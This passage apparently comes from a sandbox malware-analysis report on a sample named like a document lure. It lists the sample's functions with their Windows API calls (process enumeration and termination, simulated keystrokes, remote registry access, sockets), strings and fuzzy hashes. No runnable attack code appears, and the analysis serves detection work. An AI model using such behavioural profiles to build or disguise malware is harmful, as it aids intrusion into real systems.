                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: b70a5791e612cd7e9f052b08fff125a096e2bb75d3ede4ca3fd04d218fb12917
                                                        • Instruction ID: 18d74ef9319198916e14efcbd397ce9fa24353d13481003c41ff9c05df536581
                                                        • Opcode Fuzzy Hash: b70a5791e612cd7e9f052b08fff125a096e2bb75d3ede4ca3fd04d218fb12917
                                                        • Instruction Fuzzy Hash: 44412871204690EBEB355738ACC8B7A7FB5AB45311FA8483EE48B82761C77CE881D715
                                                        Function 0074CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0074E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0074E158
                                                          • Part of subcall function 0074E138: GetCurrentThreadId.KERNEL32 ref: 0074E15F
                                                          • Part of subcall function 0074E138: AttachThreadInput.USER32(00000000,?,0074CDFB,?,00000001), ref: 0074E166
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0074CE06
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0074CE23
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0074CE26
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0074CE2F
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0074CE4D
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0074CE50
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0074CE59
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0074CE70
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0074CE73
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: 55f902d4e2163d80a556bcbb6214771211cb5780e39eacbd4200a7b7895aca43
                                                        • Instruction ID: 63a0a9d167240e464b192c9426fcb7fc6302cc6381c411e7f942a014c85d6bf5
                                                        • Opcode Fuzzy Hash: 55f902d4e2163d80a556bcbb6214771211cb5780e39eacbd4200a7b7895aca43
                                                        • Instruction Fuzzy Hash: 9811C8B255061CBFF7216F648C8EF5E7A2DDB48794F510416F3406B1E0CAF65C419AA8
                                                        Function 0076C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0074A857: CLSIDFromProgID.COMBASE ref: 0074A874
                                                          • Part of subcall function 0074A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0074A88F
                                                          • Part of subcall function 0074A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0074A89D
                                                          • Part of subcall function 0074A857: CoTaskMemFree.COMBASE(00000000), ref: 0074A8AD
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0076C6AD
                                                        • _memset.LIBCMT ref: 0076C6BA
                                                        • _memset.LIBCMT ref: 0076C7D8
                                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0076C804
                                                        • CoTaskMemFree.COMBASE(?), ref: 0076C80F
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 0076C85D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: 5b81e0cb01a2866172d75f2ba0ba75c730da7df88bcb648d794d8ba68985f99b
                                                        • Instruction ID: 51f9e8511fcd972e2858bbc45fc2ad1c377d7c0ded4bc4265f55eef5d1f5f1a0
                                                        • Opcode Fuzzy Hash: 5b81e0cb01a2866172d75f2ba0ba75c730da7df88bcb648d794d8ba68985f99b
                                                        • Instruction Fuzzy Hash: 97913971D00219EBDB21DFA4DC85EEEBBB8AF08710F10416AF915A7281DB749A45CFA0
                                                        Function 00771AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00771B09
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00771B17
                                                        • __wsplitpath.LIBCMT ref: 00771B45
                                                          • Part of subcall function 0073297D: __wsplitpath_helper.LIBCMT ref: 007329BD
                                                        • _wcscat.LIBCMT ref: 00771B5A
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00771BD0
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00771BE2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID: hE|
                                                        • API String ID: 1380811348-1832437213
                                                        • Opcode ID: 52586e077d17d380ebc30da96bf566b1935a7349bffdd1bd8a024d2bd1b8c3d3
                                                        • Instruction ID: 84cb9996593b565bb380f3b1dac7ce7e8a09586e18bc58afc38646743cc5248c
                                                        • Opcode Fuzzy Hash: 52586e077d17d380ebc30da96bf566b1935a7349bffdd1bd8a024d2bd1b8c3d3
                                                        • Instruction Fuzzy Hash: F6518171504300DFD720EF24D889EABB7E8EF88754F40491EF58997291EB34EA45CBA2
                                                        Function 00779882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00779926
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0077993A
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00779954
                                                        • _wcscat.LIBCMT ref: 007799AF
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 007799C6
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007799F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: b7955d44d7daba8a8acb3da193706f3a7888c500d78b36438376ea2783cfab42
                                                        • Instruction ID: 34cec4ad27db4d211bbc434baad4b37770c13b3a409e82186dfd0da844e22381
                                                        • Opcode Fuzzy Hash: b7955d44d7daba8a8acb3da193706f3a7888c500d78b36438376ea2783cfab42
                                                        • Instruction Fuzzy Hash: 3E41B571900308EFEF219F64C885FEE77B8EF49390F10852AF649A7291D6799D84CB64
                                                        Function 00771620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00756F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00756F7D
                                                          • Part of subcall function 00756F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00756F8D
                                                          • Part of subcall function 00756F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00757022
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077168B
                                                        • GetLastError.KERNEL32 ref: 0077169E
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007716CA
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00771746
                                                        • GetLastError.KERNEL32(00000000), ref: 00771751
                                                        • CloseHandle.KERNEL32(00000000), ref: 00771786
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: ba3c96c40538c111f72918ff38313d8b7edae4cc2d9153ec1fcd42f151ecb698
                                                        • Instruction ID: 26df0b7961169f9c3febc3b4321e2286a8df0a81904f5bf3bba7c900f83e9905
                                                        • Opcode Fuzzy Hash: ba3c96c40538c111f72918ff38313d8b7edae4cc2d9153ec1fcd42f151ecb698
                                                        • Instruction Fuzzy Hash: 4341AC75600201EFDB18EF68C8A9FAD77A5AF48741F04C049F90A9F292DBB8DD45CB81
                                                        Function 00756237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 007562D6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 1fae9f958bedb32ccf94e30a8b91ff8826e270435746b789b7939a43f297f735
                                                        • Instruction ID: 8a9fcb677f445efdba4eaf8298270dafe635ed470b355c68cf594b16c2e60237
                                                        • Opcode Fuzzy Hash: 1fae9f958bedb32ccf94e30a8b91ff8826e270435746b789b7939a43f297f735
                                                        • Instruction Fuzzy Hash: 3311D0B6208342BBE7055754DC47EEAB39CBF15725F50002EFD41B7282E7EC6D454165
                                                        Function 0075757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00757595
                                                        • LoadStringW.USER32(00000000), ref: 0075759C
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007575B2
                                                        • LoadStringW.USER32(00000000), ref: 007575B9
                                                        • _wprintf.LIBCMT ref: 007575DF
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007575FD
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 007575DA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 0e5563524da500100ff23da4de2bdecaf9d1f8ff980e5fc884a1ae573236f78f
                                                        • Instruction ID: b7770825ca7811f0442659b64082a8db91eaef34c1122896c72c02939c9ee168
                                                        • Opcode Fuzzy Hash: 0e5563524da500100ff23da4de2bdecaf9d1f8ff980e5fc884a1ae573236f78f
                                                        • Instruction Fuzzy Hash: C10136F3540208BFE721A7D4ED8DEE7776CD708301F404496B746D2041EA789E858B75
                                                        Function 00772A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 00773AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00772AE7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3479070676-0
                                                        • Opcode ID: bf9035e0debbf2363c9a1f2b27b90983ba354b2d3095394003e63d2354033735
                                                        • Instruction ID: 99129f7289431e4d9b43b76d111f8fa4a4147136ca0a9d5cffec865f588636b0
                                                        • Opcode Fuzzy Hash: bf9035e0debbf2363c9a1f2b27b90983ba354b2d3095394003e63d2354033735
                                                        • Instruction Fuzzy Hash: C2916A71204201EFCB11EF14C895A6EB7E5FF98350F14881DF99A972A2DB38ED46CB52
                                                        Function 00769AC3 Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                        • String ID:
                                                        • API String ID: 1718709218-0
                                                        • Opcode ID: a455c82552ef0a28120d43405d3c330c44e34d30ebdcb6c14ac3c17f652b5d30
                                                        • Instruction ID: 5b6017469870ec6333627b81e5e136036f8e9af6986672a92b5befadb83262b0
                                                        • Opcode Fuzzy Hash: a455c82552ef0a28120d43405d3c330c44e34d30ebdcb6c14ac3c17f652b5d30
                                                        • Instruction Fuzzy Hash: 0F71A171504200EBC714EF64DC49EABB7E8EB88720F10451DF95697291DB78DD45CBA2
                                                        Function 0073B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __mtinitlocknum.LIBCMT ref: 0073B744
                                                          • Part of subcall function 00738A0C: __FF_MSGBANNER.LIBCMT ref: 00738A21
                                                          • Part of subcall function 00738A0C: __NMSG_WRITE.LIBCMT ref: 00738A28
                                                          • Part of subcall function 00738A0C: __malloc_crt.LIBCMT ref: 00738A48
                                                        • __lock.LIBCMT ref: 0073B757
                                                        • __lock.LIBCMT ref: 0073B7A3
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,007C6948,00000018,00746C2B,?,00000000,00000109), ref: 0073B7BF
                                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0073B7DC
                                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0073B7EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1422805418-0
                                                        • Opcode ID: 65922d76671d6838e6f5764c75bdfe52a49b86dcbcdc16e77ef7ccd52e902012
                                                        • Instruction ID: 4a9fae5648cbc6099b14982eac5a017e4d61860283eed930e1396bdb3997a423
                                                        • Opcode Fuzzy Hash: 65922d76671d6838e6f5764c75bdfe52a49b86dcbcdc16e77ef7ccd52e902012
                                                        • Instruction Fuzzy Hash: 144105B1E01215DBFB10DF68D8453ACB7B4AF41325F10821AE625AB2D3D77CA901CBD5
                                                        Function 0075A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0075A1CE
                                                          • Part of subcall function 0073010A: std::exception::exception.LIBCMT ref: 0073013E
                                                          • Part of subcall function 0073010A: __CxxThrowException@8.LIBCMT ref: 00730153
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0075A205
                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0075A221
                                                        • _memmove.LIBCMT ref: 0075A26F
                                                        • _memmove.LIBCMT ref: 0075A28C
                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0075A29B
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0075A2B0
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0075A2CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: 492779737747feb0738283581697d50a4cb28d09d4fba42d519be527bf59304c
                                                        • Instruction ID: 02d844087d42bd26a5df162fcc6a26a3a6ce7e8bdb51911c83f21a2d15ac3330
                                                        • Opcode Fuzzy Hash: 492779737747feb0738283581697d50a4cb28d09d4fba42d519be527bf59304c
                                                        • Instruction Fuzzy Hash: 2531A131900205EBDB10DFA4DC8AAAEB7B8FF85710F1480B5F904AB256D778DD15CBA5
                                                        Function 00778CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00778CF3
                                                        • GetDC.USER32(00000000), ref: 00778CFB
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00778D06
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00778D12
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00778D4E
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00778D5F
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0077BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00778D99
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00778DB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: ef445d8a03508ffb629bf1914809047dc82ae1abb11d4846bf7656eeaa7e6df0
                                                        • Instruction ID: 2d1e8a31b239a82f16f59b497bc37bf6aaee360d7f677162a05d2c50c635784d
                                                        • Opcode Fuzzy Hash: ef445d8a03508ffb629bf1914809047dc82ae1abb11d4846bf7656eeaa7e6df0
                                                        • Instruction Fuzzy Hash: 7D318D72240614BBEF208F51CC4AFEA3FA9EF49791F048055FE089A291DA799C42CB74
                                                        Function 00761BFA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                        Download Yara Rule
                                                        APIs
